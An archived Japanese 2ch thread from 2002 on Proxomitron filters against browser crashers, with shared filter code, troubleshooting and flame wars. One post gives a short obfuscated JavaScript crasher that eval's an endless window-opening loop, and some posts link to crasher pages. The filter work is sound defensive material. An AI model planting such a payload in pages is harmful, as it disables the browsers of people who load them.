・・・。 どっちかっつったらウイルスチェックとかscandiskとかやったほうがいいのかもな。 一旦default-backup.cfg読み込んでもダメ? 問題の原因がわかってないなら、最初からやり直したほうがいいと思う。 それと、もしエディタで直接default.cfg弄ってるなら保存する形式も注意しといたほうがいいかも。 間違ってもUNICODE(utf16)なんかで保存しないように。
>>677 ちょっとパニックになってるべ。
とりあえず、今のオミトロンを終了して、
他のフォルダを作って新たにオミトロンをインスト。
デフォルトのフィルタにtocさんのフィルタを入れる。
で、そっちで起動してみる。
正常に起動したら、古い方のフィルタから自分に必要なものを一個ずつ移植。
で、スタートアップを旧オミトロンから新しい方に変更。
古いほう削除。
>>673 > マジで?
>>347 以降を参照すれば、4.4用が出る前にほかの人がとりあえず
CPU使用率100%にならないようにして普及してたフィルタが
意味のないものだということが書いてあるよ。
681 :
677 :02/11/14 13:31 ID:livMknMV
>>678 すいません、フィルタバックアップので戻したら直りました。
ブラクラでフィルタが壊れた??
>>679 とりあえずうまくいかないのを検証する為にも一度オミトロン入れなおして、
tocさんの新しいフィルタのみマージして試しました。
結果
>>647 と同じことになりました。ううむ・・・
682 :
名無しさん@お腹いっぱい。 :02/11/14 14:22 ID:J88f2Xup
683 :
:02/11/14 19:42 ID:LzWwu0zt
684 :
673 :02/11/15 00:00 ID:4llQFYU5
どうでもいいけど673は漏れで675ではないのだが。
>>680 サンクス。
Protect Contents except HTML (2002/11/10)がwindowsupdateの邪魔をします。 けどSafeListには[^/]++.microsoft.com/ってあります。 どうすればいいのでしょうか。
>>685 BypassListに[^/]++.microsoft.com/
あ。IEだとutf16で素通りできる。 Match = "<start>"なフィルタがあればOperaはまず大丈夫だけど、IEだと 文字化けしつつもhtml解析しやがる。MIME偽装だとそのまま食らうし。 漏れは普段IE使わんから関係ないけど。フィルタ作る人はがんがれ。
>>685 俺はWindows UpdateはIEでプロキシ通さない設定にしてるが
イメタグにmailtoやらc:\conconやら書いてあるだけ。ウイルス無し。 とりあえずKUP入れとけ
KUP入れたら撥ねました。ありがとうございました。
692 :
名無しさん@お腹いっぱい。 :02/11/16 16:05 ID:En7bSLQ9
>>685-686 >>688 ん?ダウンロードしてそのまま使ってるけど
デフォルトのままでリストに入ってるのかどうかはしらないが
ウィンドウズアップデートできるように
なってないか?
Protect Contents except HTML (2002/11/10)は関係ないのでは?
693 :
685 :02/11/16 16:24 ID:2WpRrmNp
Protect〜は
http://toc.dyndns.org/bc/Anti_Browser_Crasher0211101.zip の追加フィルターなのでProxN44のデフォルトにはない気がする。
漏れのBypassList(ProxN44でふぉ)には
[^/]++windowsupdate.microsoft.com/
[^/]++windowsupdate.com/
って入ってる。
SafeList(ABCで追加)には
[^/]++.microsoft.com/
って入ってる。
んで邪魔されたのは正確にはwindowsupdateではなくてwindowsupdateのupdateだった気がする。
よくわかりません。
updateはproxomitronバイパスしたら通りますた。とりあえず問題なしです。
694 :
名無しさん@お腹いっぱい。 :02/11/16 16:38 ID:En7bSLQ9
>>693 いやそうじゃなくて、私初心者だし
2chのスレで紹介されてるフィルターを少しいじったりして、
Protect Contents except HTML (2002/11/10)もいれてるけど、
最初からバイパスせずともオミトロン使用で
ウィンドウズアップデイトできてるけど?
>>694 BypassListetc.にたまたま入ってたんじゃねーの?
色々入れてるうちに誰かのリスト上書きしてたとか。
696 :
685 :02/11/16 16:48 ID:2WpRrmNp
はい、今はバイパスしなくてもそのままupdateできます。 よくわかりません。 んで、updateのupdateのときにもしかしたら何か違っていたのかなあと。 もはやよく覚えていませんし、想像ですけど。
697 :
名無しさん@お腹いっぱい。 :02/11/16 16:51 ID:En7bSLQ9
>>695 それはないよ。
定期的にフィルター整理めんどいから、一からダウンロードして
2chスレや過去ログからフィルターひっぱってきてるぐらいだし
そもそもフィルター追加する前に、ダウンロードした直後の4.4で
できるって。
KUPって何
>>698 ブラクラ対策フィルタのKill Unexpected Protocolsっていうやつ
更新キタ━━━━━━(゚∀゚)━━━━━━━!!!! 11/17: タグの中に改行、タブ、スペースなどを含んでいたり、タグ自体が 非常に長いものでもマッチするようにProtect Contents except HTMLを修正。 Kill Unexpected Protocolsにおいてダブルクォートで囲まれていないFlashで 誤爆していたのを修正。
702 :
名無しさん@お腹いっぱい。 :02/11/18 00:50 ID:K73g6pv0
>>702 ホントだ。対策してくださいm(__)m >tocさん
すんません、KillTooManyFramesのみ、前のバージョンに戻すか Matchの先頭の*を除いてください。。
あとで修正版うpします
(゚Å゚ )ホゥ
バナーだらけのトコ紹介して
修正版うpしました。。
あれ?なんで
>>707 さんとIDが同じなんだろう?
串さしてないのに。。こわ
711 :
707 :02/11/18 01:33 ID:9YtE6YrE
>>709 さらに速くなりました。d
ホントだ。IDが一緒・・・ちょっとビックリ
仕事はや!
ぉぉ。久しぶりに串なしのID一緒見た。 問題なければfusianasanしてくれない?>お二方
714 :
名無しさん@お腹いっぱい。 :02/11/18 02:43 ID:44jBQHOR
なんかどのページでも激速になったような
tocによるtocのためのジサクジエンだから気にしちゃ駄目っ!
いーんじゃねーの?きちんと使える物なんだから ジエンしても俺は許す。 そのかわり 腐ったフィルタ食わせよう物ならTOKYO湾 の水を未処理で10リットル飲ませる。
昨日4.4 with toc1110に移行したら(敬称略) もう新しいのがキタ━━━━━━(゚∀゚)━━━━━━━!!!! ご苦労様でし。
ほらあれだ、太陽黒点とかエルニーニョとかラニーニョとかアレだ。きっとそうだ。他にも角度とか。
720 :
名無しさん@お腹いっぱい。 :02/11/18 19:55 ID:2tbA6oE1
画像ファイルでもJPEGのみダウンロード、GIFやBMPは ダウンロードしない、っていう設定はできまつか?
できる。
拡張子で接続を切るかどうかっていうのは簡単にできるよ。 ただ、ファイルの先頭何バイトかを見て種類を判断する、というのだとけっこう難しいかも。
ドラクエ4みたいだな
725 :
:02/11/19 19:54 ID:4LLO4LWj
ここの住人に聞きたいことがあります
いまProxomitron通してSleipnir使ってますが
http://www.atstyle.co.jp/index.jspを開けようとすると 別窓で「セキュリティの警告」と言うのが大量に出てきて困ってます
(ちなみに同じ状況でもMDIブラウザの方は全然問題ないのが不思議なんすよねぇ)
Proxomitronを切ると通常通りに使えるんだけどいちいち切り替えるのも嫌だし
この場合Proxomitronをどう設定すればいいか?誰か良い方法を教えてもらえませんか?
よろしくお願いします <(_ _)>
726 :
名無しさん@お腹いっぱい。 :02/11/19 20:01 ID:yz1nTdCQ
そんな警告はまったく出てきませんが? Kill External Scripts とか使えば。 それか、バイパスリストに加える。
というかスレタイ嫁。
>>725 dbugして原因になってるフィルタ探せば?
729 :
名無しさん@お腹いっぱい。 :02/11/20 18:25 ID:mnG9NlpI
>>725 MDIブラウザでそれが出ないんならSleipnirが原因だろ。
ここで聞くのはスレ違い。
>>731 ( ´_ゝ`)フーン 凄い事になってるね、どうでもいいけど
更新お疲れ(^^)/~>tocさん
tocの自演を見破るフィルターはありますか?
ひろゆきか削除人でないと (たった一行の騙りから本人を断定するのは)難しい
736 :
名無しさん@お腹いっぱい。 :02/11/22 14:01 ID:ZqVdjUQQ
確かにtocさんにはお世話になってるけど なんかわざとらしいレスがつくな^^;
wwwcで更新チェックしてたらすぐわかるやん
俺はwwwcとか更新チェック使っとらんが ここで更新が分かるという点では 自演でも騙りでも情報としては十分だと思う そういやマルコッポーロどうしてんだろ
>>733 は、tocさんじゃないよ。更新されてたんで、メッセージ残しただけだし。
741 :
740 :02/11/22 23:34 ID:22QehQYI
まぁ私の言うことを信じたくなければ信じなくていいよ
IDが毎回変わってますますあやしいなw
>>741 そうやって、人を騙るのは辞めろよ…(^^;)。こんなカキコで、スレが消
費されるのは、無駄だと思うし。
んなこたァどうでもいい。 tocはさっさと更新して 漏れらはtocさんが作ってない他の部落裸対策フィルタ作ったり 部落ら作ったりすりゃあいいわけだ。 最近ブラクラあんまみないな
746 :
名無しさん@お腹いっぱい。 :02/11/23 10:18 ID:3f6ek3sm
ていうか別に恩着せがましく更新報告されるくらいなら 別にTOCじゃなくてもいいや
doukan
自分でフィルタを描ける人は良いかも知れないが、俺みたいなのにとっちゃ 随分助かってるからあまり煽るような事はいわんでくれ
ブラクラフィルター更新されたよ。
750 :
名無しさん@お腹いっぱい。 :02/11/23 20:25 ID:gNo7Oo+J
>>748 助かるのはわかるが、
恩着せがましくされてまで
もらうほどじゃないよ
>>750 おまえみたいな馬鹿のせいで
今までどれだけのフィルタ公開サイトがつぶれてきたと思ってるんだ。
おまえはこのスレに必要ないから消えろ。
gNo7Oo+J ↑ NGワード
take&takeなやつ増えすぎ。
Name = "Encoded Script Killer" Active = TRUE Limit = 15 Match = "JScript.Encode" Replace = "JScript.Killed"
757 :
名無しさん@お腹いっぱい。 :02/11/23 22:03 ID:QOJFfiUR
防げます。Protect Contents except HTML (2002/11/18)
なんでやねん。。。
"Content-Length: always filter (In) これですか?
それを(In = TRUE,Out = FALSE)にしておかないと、 Protect Contents except HTMLはお仕事しないぞ。
はい。してます
>>758 消えちゃったし、試しようがなくなってしまいました・・・
>>767 できたみたいです。
>>763 キャッシュがのこっていたみたいです
ありがとうございます。
>750はハナクソ
ネタスレの匂いがしてきたな
Kill Huge Images って 100.000001 とかのサイズ的には問題なさそうなのにもマッチするんだけど 0+[1-9][0-9]+{4,*} とかに書き換えるとマズい?
>>771 そのフィルタはブラクラ対策というより嫌がらせ封じだからなんでもいいんじゃない?
ためしに自分ででかいサイズのイメージタグを含んだHTMLを
書けばわかると思うけど、ぜんぜんブラクラにはなってないから。
773 :
名無しさん@お腹いっぱい。 :02/11/24 16:45 ID:xfX8GfTf
ぜんぜん話は変わるが、反プニル派よ DonutP5.0αでたよ
775 :
名無しさん@お腹いっぱい。 :02/11/24 21:15 ID:/ny/ro5i
>>774 壁紙のせいで、文字が見にくいな。
これでオペラの何たるか語られても、
オープンソースのほうがセキュリティ的には安全だ
とか言いながら日本人指摘の穴は放置されぎみのMozillaみたいに、
説得力ないな。
>>774 どこらへんがプチブラクラ? (あんましフィルター作動してないみたい。)
>>777 (スリーセブン)
ちと食らったっぽい。。。
タイマーで助かったかな・・・。
779 :
771 :02/11/24 22:34 ID:Il2KtsoL
>>772 サンクスコ
別にブラウザがクラッシュするとかそういうことはなさそうなんで
外しちゃいました。
780 :
:02/11/25 23:07 ID:yQ3mHm2r
アプリエラーが出た「SafeList.txtが開けません」解決方法はありませんか?
>>780 SafeList.txtをListsフォルダに入れてる?
入れなくても2度目からはその警告は出なかったような。
ななこって誰?
あっぷあっぷ
784 :
名無しさん@お腹いっぱい。 :02/11/27 16:45 ID:iravqhio
日に日にWindows版スレに存在意義をとられていっているな。
>>784 賑わうのは2ch広告消しが機能しなくなった時ぐらいだしね…
ブラウザで見るなら広告見ろよと言いたい。
べつに前からこんな感じだと思うけど? フィルタの不具合報告とか新しいブラクラ報告とかは 最近あんまりないからそう感じたのかな。
ブラクラフィルタ更新sage
>>786-787 でもまぁある意味それだけ既存のフィルターの完成度が高く、
必要なものが広く一般公開されているということだね。
ほんとありがたいことだ。
ここ見て自分なりに改造して嗜んでるよ。
なおこって誰?
793 :
織部箸にました ◆RFRqJLqvX. :02/11/29 12:17 ID:KhcbI7oU
一般人にはどうでもいいけど 少年ナイフはメンバー1人脱退してる 世間的にはテレ朝のアニメのエンディング曲バナナチップスと、 雛形あきこと鈴木さりなの出てた飲茶楼のCMソング飲茶楼でめちゃうまかろう、で知られているな
794 :
織部箸にました ◆RFRqJLqvX. :02/11/29 12:17 ID:KhcbI7oU
やべー ロビーかと思ってレスしてもうた 気にしないでくれ なんでもない
Proxomitronってなにをするもの? 簡単なの?
>>793 3人いてそのうちの二人が姉妹じゃなかったっけ?
作者は少年ナイフのことをしきりにカワイイカワイイ言うとるけど、 今やカワイイっつーかただのオバさんだよな・・・
なおこに飽きたら、名前変わるんだろうか・・・。 突然マイケルとかになったら、なんかきもいが。
http:// ↑に<a href=></a>を付け足すフィルターありませんか?
よく<a href=></a>がついてないサイトを見かけるので
いちいちコピペするのがめんどい。
だから直リン状態にしたい。
ttp,tp,htpをリンク化するフィルターはあるのですが・・・
情報キボン!
800 :
799 :02/11/30 06:28 ID:E2tG+uYP
Name = "HTP DIRECT LINK"
Active = TRUE
Limit = 256
Match = "(\s|>)\2htp:(*)\1(\s|<)\3"
Replace = "\2<a href="
http:\1 ">htp:\1</a>"
"<font color="#FF0000" SIZE="-1"> HTP.Poxomitron</font> "
"\3"
↑ちなみにこれは俺が作ったフィルター
問題なのは直リンも直リンにしてしまう事。
801 :
799 :02/11/30 06:31 ID:E2tG+uYP
はっきり言って
>>800 はttpとかを改造しただけです!(爆
で↓が折れの使ってるttpフィルター
Name = "TTP DIRECT LINK"
Active = TRUE
Limit = 256
Match = "(\s|>)\2ttp:(*)\1(\s|<)\3"
Replace = "\2<a href="
http:\1 ">
ttp:\1</a >"
"<font color="#FF0000" SIZE="-1"> TTP.Poxomitron</font> "
"\3"
ttpだったリンクは赤字でTTP.Poxomitronと隣に出ます。
802 :
799 :02/11/30 06:43 ID:E2tG+uYP
>>800 誤爆!
こっちでした!
Name = "HTTP DIRECT LINK"
Active = TRUE
Limit = 256
Match = "(\s|>)\2http:(*)\1(\s|<)\3"
Replace = "\2<a href="
http:\1 ">
http:\1</a >"
"<font color="#FF0000" SIZE="-1"> HTTP.Poxomitron</font> "
"\3"
ブラクラフィルタ更新sage
805 :
名無しさん@お腹いっぱい。 :02/11/30 15:01 ID:Su/Fekfp
806 :
805 :02/11/30 15:09 ID:Su/Fekfp
>>799 ああ 赤字で HTTP.Poxomitron って表記させるとわかりやすいね
機能ばかりにこだわってて こういう発想思いつかなかった
ただいちいち普通に直リンされてるのまで書き直してて無駄が多いんで
書き換えた
807 :
804 :02/11/30 17:37 ID:QO+ko5lZ
tocさんではありません。
tocさん乙
荒れてきてんな。。
むやみに上げてる香具師は信用ならん。
ユーザー、開発者、提供者、すべてのクソが集まるMSX
誤爆スマソ(w
815 :
名無しさん@お腹いっぱい。 :02/12/03 18:09 ID:V2PK3dJ0
>>811 ageないからまともな書き込みが増えないじゃないか。
お気に入りに入れてる人や検索で探し出す人、だけがすべてじゃないのだな。
∠(´ー゚)┌
>>815 荒れるからageんな。
関係ないがshort refreshが誤爆しまくりでいやん。
>>820 転送元も転送先もブラクラじゃないあたりが誤爆じゃないかということです。
待ち時間無しで飛ばすのは一般的に使われてるのでSafeListでの対応は現実的でないし
オフにするとブラクラに引っ掛かるのでKill Unexpected Protocolsから
short refreshを分離して欲しい…。
ああ、そういう意味か! 勝手に転送されるのいやだったから 気にも留めてなかったけど、 言われてみるとそうだね。
セキュリティのために必要。 自分はクリックしてもいないのに勝手に飛ばされるのはイヤ。 飛んだ先に未対応のブラクラがある可能性だってあるし。 第一「転送先がブラクラかどうか」なんて読む前から判る訳がないかと。
なくすんじゃなくて分割してほしいという要望だと解釈したんだけど。。
まぁでも分割するならAnti-Auto-Refresherを使えってことになるかな。
826 :
823 :02/12/04 01:14 ID:URMsd7R/
>824 あーなるほど、、(汗 失礼、、
ついでにはっとく [八王子海パン突撃騎兵隊] TOO MUCH LOVE WILL KILL ME www.hoeee.sixeven.com/toomuchlove/ [RSTslave]かすみハードラヴver.1 www.hoeee.sixeven.com/kasumihard/ [OVACAS] OVACAS SKETCH 4 www.hoeee.sixeven.com/sketch4/
828 :
名無しさん@お腹いっぱい。 :02/12/05 04:28 ID:rK4q2biu
ブラクラフィルタ更新sage
>827 全部おなじやん
tocさん(・∀・)アリガトウ!!
831 :
名無しさん@お腹いっぱい。 :02/12/05 09:10 ID:lN9HbaMv
オミト論昨日インスコしてみたんだけど、起動した時から効果はあるんですか? バイバスというのは押さなくていいんでしょうか?うまく広告とか消してクレナくて・・・
テスト
バイパスってなんですか?使用しないってことでつか?
てst
Kill Unexpected Protocolsが下のタグで誤爆します。 <a href = "javascript:popup('../tv','tv',410,560)"> hrefと=の間に空白があるとダメみたい。
500490
ブラクラフィルター更新されたよ
842 :
名無しさん@お腹いっぱい。 :02/12/06 23:26 ID:s2f897Nn
>>841 TOC自作自演うざい。
いちいち報告してくれなくていい。
かきこむな。
報告がなかったらこのスレの存在価値がないと思うが
氏ねカス
うるせー馬鹿。 このスレはtocなしで進めるぞ。
Toc氏のサイトにはあまり行かないから更新報告は続けてほしい
だったら次スレは「ブラクラ対策ページヲチスレ」にでもすればぁ?
>>842 よ
おまえイヤシイぞ!嬉しくてしょうがないくせに(プッ
お山の大将気取りの
>>842 が見れるスレはここですか?
tclockがproxomitron通すようにする方法を教えてください
やっぱ初心者スレ行きます
( ゚д゚)ポカーン
>>842 >>841 を書いたのは、tocさんじゃないよ。前スレで更新報告した時にも、
自作自演って言われたけど。何でもかんでも疑うのは、どうかと思うが…(苦笑)。
つうか煽りと荒らししかいなくなった模様
>>858 そのページ、Kill External ScriptsとKill Excessively Nested Tablesだけで防げるからつまらん。。
>>858 楽勝です。設定をもう一度見直した方がいい
862 :
858 :02/12/08 19:50 ID:Jqbs4YeM
漏れはあふょなので、再インスコして、初期から設定しなおしてみますι 成功したら報告(*'-')
863 :
858 :02/12/08 20:49 ID:Jqbs4YeM
全然だめでした・・・ IE6 うぃん2kなんですけど・・・ ツール>ネットオプション>接続>アクティブな接続の設定>localhost 8080 をやって、859さんのフィルタと、その他色々使えそうなのをオンにして、 設定もちゃんとセーブしてロードして、バイパスをへこませて、 例のホムペいってみたけど。。。結果は同じ、ウィンドウオープン以外は 全部ひっかかりました。 何がいけないのでしょう。
>>863 バイパスまでオンにしたら意味ないじゃん
865 :
858 :02/12/08 21:06 ID:Jqbs4YeM
>864 バイパスって、ひょとして一時的に設定を無効にするものですか? オフにしていってみました。 無理でした。なぜr・・・・ちゃんとマージしましたよ・・・・
>>865 インターネットオプションでダイアルアップのほうとLANの方と2つあって、
自分に適切なほうのプロクシ設定をしていますか?
>865 はい、自分はAirH"です。ダイヤルアップ接続してます。 やっぱり機能してません。。。なぜι
>>867 通信中にProxomitronの
Active connections: 00
っていう部分は変化してる?
変化してないんだったらそもそも導入ができてないから
もう一度ヘルプを隈なく読んでチェックしなおしてみて。
何度もすみません(つд`) >868 日本語パッチあててます。 IEで読み込んでるとき、「アクティブな接続 :01か02」と出てきます。 フィルタは通っているみたいです。。。でもなぜι 例の実験室、right clickフィルタオンにしてるのに、右クリックできません。
>>869 □ Web Page Filters
□ Outgoing Header Filters
とかのチェックボックスのチェックをはずしてない?
メインウインドウのチェックボックスが5つあって、
上から3つ目まではすべてチェック入ってる?
>870 はい、上から4つ目までは全部チェックいれてます・・・ なんでだろう( ノ_;) NISやNAVが邪魔してるのでしょうか。どっちも無効にして試して みましたけど、変わりませんでした。そもそもNISのせいなのか、 全画面モードすらできません。フィルタ意味ないし・・・ 今日はもう頭冷やして逝ってきます。ご迷惑かけましたm(_ _)mうぅ
>>858 キャッシュの削除
IEオプション>全般>設定>ページを表示するごとに確認する
873 :
858 :02/12/09 06:46 ID:RaijiIa0
タダイマァ(´▽`)ノ夜勤帰りでっす。 って・・・ >872 (ノ≧▽)ノ<おおおー! その処置をしたら、ちゃんと機能しました! ちゃんとIEなどの基礎を勉強しろと言うことですねιお世話かけました。 みんなありがとう!!!
古っ!
878 :
名無しさん@お腹いっぱい。 :02/12/10 17:21 ID:FT/w9drJ
>>877 アクセスできなくなってるぞ。
まぁいいけどどんなだったか気になる。
879 :
アンチ2ch広告消し派へささぐ :02/12/10 17:37 ID:FT/w9drJ
880 :
名無しさん@お腹いっぱい。 :02/12/10 17:37 ID:FT/w9drJ
((^?)|index)))"
"("
" $NEST(<table[^>]++>,*<a href=("|)
http:// (jump.2ch.net|adfarm.mediaplex.com/ad/)*,</table>) (<br>|<p>|)"
" |"
" $NEST(<center>,*<a href=("|)
http:// (www.binboserver.com/|asian.pinkcount.com/|www.maido3.info/)*,</center>)"
" |"
" $NEST(<A href=("|)
http://FRIEND.P-CLUB.COM/*<IMG*,</A ><BR>)"
" |"
" <a href=</a><br>$STOP()"
")"
"|"
"($URL(
http://[^/]++. (2ch.net|bbspink.com)/[^/]++/bbs.cgi))"
"("
"<br><br>$NEST(<table[^>]++>,*<a href=("|)
http://adfarm.mediaplex.com*,</table >)$STOP()"
")"
Replace = "\@"
881 :
名無しさん@お腹いっぱい。 :02/12/11 12:17 ID:p9OeC24j
882 :
名無しさん@お腹いっぱい。 :02/12/11 12:31 ID:m7nBYmVP
ぐはっ・・・目がぁ目がぁぁぁチカチカするぅぅぐぁぁ・・・・
885 :
名無しさん@お腹いっぱい。 :02/12/11 13:20 ID:p9OeC24j
ウィルスも入ってるらしいのよ。あーこえー。
886 :
名無しさん@お腹いっぱい。 :02/12/11 16:50 ID:7Jart/pJ
MozillaとNetscapeに対応したバージョンのMultipleはjar: URLハンドラ内において ヒープバッファオーバフローに対して脆弱性があります。 特別に細工されたGIFファイルを参照付ける悪意のあるjar: URLを作成する事によって、 リモートの攻撃者はバッファをオーバフローさせ、一度そのリンクがクリックされると、 被害者のブラウザをクラッシュさせるかシステム上で 任意のコードを実行することができてしまいます。 影響 アクセス権の奪取
CPU使用率が100%にならないようにするには どうしたらいいの?
889 :
名無しさん@お腹いっぱい。 :02/12/11 21:12 ID:mpfE+n8p
890 :
887 :02/12/12 15:02 ID:X0mWy/BQ
>>892 その404.htmがブラクラになってませんか?
>>893 なるほど、、その先は見てなかった。。
でも全部防いだよ?
>>895 自分がやったのは
toc氏のブラクラ対策に置いてある奴と
Proxomitron-Jから
Local File Access Killer
Protocol Src Killer
を入れただけです。
最初から入ってるフィルタのチェックはデフォルトのままです。
これだけじゃダメってことですか?
それともどこかの設定がおかしいってことですか?
>>858 のブラクラは防いでいるようなのですが・・・
dbug
898 :
タモサソ :02/12/14 00:46 ID:QWwm8QPM
洩れポップアップ除去の為だけにこれ使ってたけど正直使いにくいね。 確かに設定の融通はきくかもしれんが、デフォルトのままじゃ使いものに ならないし、事ある毎にスクリプト見てチェックしては自分で フィルタ追加したりしてやらないといけないし面倒でしょうがないよ。 これじゃあ自分でプログラム組んでこのソフト作ってるようなもんだ・・・。 もうやってられません。洩れ、明日から他のポプアップテゥール使いマス・・・。
>>898 おれはそれがいいとこだと思ってるんだがな
融通がききまくるから未知のタイプの広告やブラクラにも対応できるし
901 :
名無しさん@お腹いっぱい。 :02/12/14 04:24 ID:ymjbhBJq
未知
902 :
名無しさん@お腹いっぱい。 :02/12/14 14:14 ID:MvMk4eK5
ヽ(;´ー`)ノ なんでこっちのスレは停滞してるんすか
フィルタに頼らずともブラクラなんぞ踏まなくなった。
907 :
名無しさん@お腹いっぱい。 :02/12/17 20:08 ID:TkXjpyxR
>>906 じゃあファイヤーウォールも串指しも止めてフシアナさんでIP晒せ(´ー`)y-~~
908 :
名無しさん@お腹いっぱい。 :02/12/17 21:50 ID:8Q+WGyQn
ブラクラだれか貼って
910 :
名無しさん@お腹いっぱい。 :02/12/19 22:41 ID:TFkq2dFY
だからどうして盛りサガってんすかこっちのオミトロンすれ(;´ー`)y-~~
特に話題ないし 主要なブラクラ対策はそろっちゃったから
913 :
名無しさん@お腹いっぱい。 :02/12/19 23:13 ID:xlwXTmCp
Proxomitronってパーソナル・フアイヤーオールと 相性悪いの? ZoneAlarmをインストールしたら突然ネットワークに 接続出来なくなる事が多くなった 前触れもなく急に接続出来なくなるんだ 良いお知恵を拝借できませんか?
>>913 漏れは両方インストールしているが問題ない。
そういう場合ZoneAlarmを真っ先に疑うだろ Proxomitronは単なるHTTPプロキシだよ HTTP以外は関係ないし、HTTPでもプロキシ通さない場合は関係ない
916 :
名無しさん@お腹いっぱい。 :02/12/20 17:30 ID:VPoOCaip
>>913 それは単にファイヤーウォールにProxomitronの許可なり出さないで
拒否してるだけでは?
あなたみたいな人はファイヤーウォールは意味ないから
アンインストールしなよ。
>>916 いくらなんでもそこまではないだろ。
文面から見てよ。
918 :
名無しさん@お腹いっぱい。 :02/12/21 14:26 ID:NP7daNM9
お前ら言い過ぎだぞ
921 :
名無しさん@お腹いっぱい。 :02/12/21 18:21 ID:iMxXW7ii
煽りも低級ですね。もうこなくていいよ
923 :
名無しさん@お腹いっぱい。 :02/12/21 19:49 ID:E/JkEquC
>>922 自分の未熟さを棚にあげてオミトロンのせいにするバカが逆ギレですかヽ(´ー`)ノ
924 :
名無しさん@お腹いっぱい。 :02/12/21 20:34 ID:ZCwUEg5m
var brscript = "fo"+"r(;;)op"+"en();"; eval(brscript); これはどうだ〜〜〜〜
俺がいつオミトロンのせいにしたんだ?
火壁の設定もできねえ奴が切れてたのに文句言っただけだろ。
>>917 が文面を見れとか言ったが
>>913 にはただぞぬを入れたとしか書いてねえじゃん
とりあえず日本語勉強しなおしてから出直してこいよ。
逆切れの使い方からして間違ってる
>924 ウヒィ
927 :
名無しさん@お腹いっぱい。 :02/12/21 20:46 ID:E/JkEquC
>>925 必 死 だ な (w
まぁおまえの勝ちでいいから泣くなって。
>>927 はい、必死です。泣いてます。
それは認めますのでそういった低次元の言葉以外で分かるように
返事してもらえませんか?
>>925 で言ったことにまともな反論を求めます
なんかつまんねえ馬鹿同士の言い争いだな。馬鹿同士だと面白くねえな。読んで損した。
結論を言うと逆キレとか言い出したID:iMxXW7iiが基地外
931 :
名無しさん@お腹いっぱい。 :02/12/21 21:43 ID:UvzlPBUB
(・ー・)オワッタナ・・・
932 :
917 :02/12/21 21:50 ID:kQqQtE0w
なんだ?くだらない言い合いしてたんだな。 オレも混ざりたかったよ。
>>912 についての意見求む。
スレ立て権は今4つ保持してます。
>>934 たしかにWin板も一時期ほどレスも多くないからね。
ソフ板は静かに終了するか。
つーかこのスレどうすんの?俺は統合した方がいいと思うんだけど。 最近どっちも廃れてるし
>>937 そういう話になってる。
最近10レスくらい読め。
統合でいいんじゃないの。
941 :
名無しさん@お腹いっぱい。 :02/12/22 11:27 ID:h9nHIrNl
942 :
名無しさん@お腹いっぱい。 :02/12/22 11:44 ID:1/5WoLNX
あーあもともとこんな感じなのに厨房に 勝手に統合やら勝手に決め付けられているな 自分だけさっさとむこういっちゃってくれ 仕切り屋はうざいです
943 :
名無しさん@お腹いっぱい。 :02/12/22 11:46 ID:ofTp5EFx
なんか動かないなぁ 設定がおかしいのかな?
945 :
名無しさん@お腹いっぱい。 :02/12/22 14:43 ID:RtLeNFi5
なぜZoneAlarmとProxomitroを併用すると突然 ネットワークに接続出来なくなるんだ? もちろんZoneAlarmでの設定はProxomitroを許可にしてるけど Proxomitroを終了して再起動すると再び接続できるようになる のはなぜなんだ?
釣り放題?
>>945 まだそこでつまづいてるの?
キミProxomitronを使うセンスないと自覚してさっさと削除すれ。
はげ いうな
>>945 「ネットワークに接続出来なくなる」ていう意味が良くわからん
HTTPはアプリケーションレベルだから
ネットワーク層にまで影響するとは思えない
953 :
名無しさん@お腹いっぱい。 :02/12/22 17:43 ID:TNihVA4t
>>945 しねしねしねしねしねしねしねしねしねしねしね
初心者板からやりなおしてこいつーか
わからないならオミトロンもFWも使うな
意味ない。
しね。(´ー`)y-~~
954 :
名無しさん@お腹いっぱい。 :02/12/22 18:22 ID:YGwZ0F+u
>>945 ZoneAlarm日本語のパッチあててるんちゃうかな?
英語版のままだとうまくいくよ
ZoneAlarmで日本語パッチあてたらYAHOOメッセンジャーもログインできなくなる
日本語のパッチに問題があるんだけど、何が原因かわからないよ
サイトで質問してきいたら原因はわからないってこたえられたよ
英語のままで使ったらうまくいくはずだからやってみてよ
(偶然とおりかかったものより)
955 :
名無しさん@お腹いっぱい。 :02/12/22 19:50 ID:D1rHlIx9
新スレは?
957 :
名無しさん@お腹いっぱい。 :02/12/22 20:53 ID:Qw2EyPxD
>>945 それが人に教えてもらう態度か?
氏ねよ禿げ
959 :
名無しさん@お腹いっぱい。 :02/12/23 06:25 ID:kBW07W/X
新スレは?
( ´_ゝ`)フーンフーンフーン激しく( ´_ゝ`)フーン
961 :
名無しさん@お腹いっぱい。 :02/12/23 18:00 ID:blguyNg4
>>924 これは放置ですか?
eval()を殺すフィルターを作ったほうが良いと思うんですけど…
964 :
名無しさん@お腹いっぱい。 :02/12/23 21:02 ID:pjGTqqWv
>>962 963じゃないが余裕で見れます。
つーかエンコードで文字化けとかそういうのですか?
詳細きぼんたヽ(´ー`)ノ
965 :
962 :02/12/23 21:42 ID:aoGKnHqE
<Match: Kill External Scripts (2002/11/30) > <script language='javascript' src='/popBack.js'></script> </Match> <comment>External Script Killed</comment> <Match: Kill Specific JavaScripts (2002/11/23) > <script language="javascript"> <!-- if (navigator.appVersion.substring(0,1) >= '4') { document.write('<script language="javascript" src="/newwind.js">'); document.write('</scr' + 'ipt>'); 中略 </script> </Match> <script language="javascript"> <!-- if (navigator.appVersion.substring(0,1) >= '4') { document.write(' <Match: Kill External Scripts (2002/11/30) > <script language="javascript" src="/newwind.js">'); document.write('</scr' + 'ipt>'); 中略 </script> </Match> <comment>External Script Killed</comment> 長くてすみません…安西先生。 document.write('<script language="javascript"〜にKill External Scriptsがマッチしてるみたい…。マッチしないページもあるの…。
>>965 そのページが安全だと思うならURLをSafeListに加えればいいじゃん。
967 :
名無しさん@お腹いっぱい。 :02/12/23 21:59 ID:LwbMG1g9
あの〜 おみとろんの起動した画面の右上の方にフロッピーディスクのようなボタンがありますよね。 右側にあるボタンは使ったことないんですけど、なにするボタンなんでしょうか? だれか教えてちょ
>>967 それが人に教えてもらう態度か?
氏ねよ禿げ
970 :
名無しさん@お腹いっぱい。 :02/12/23 23:22 ID:ec1IhtRk
971 :
名無しさん@お腹いっぱい。 :02/12/23 23:37 ID:p6pDEAag
別に晒さなくてもいいんだよ みんな、知ってるはずだしさ
973 :
名無しさん@お腹いっぱい。 :02/12/24 20:02 ID:TDMeh3ZE
立てるなって言っただろ( ゚Д゚)ヴォケ!!
976 :
名無しさん@お腹いっぱい。 :02/12/25 21:12 ID:CHIPeTiI
983 :
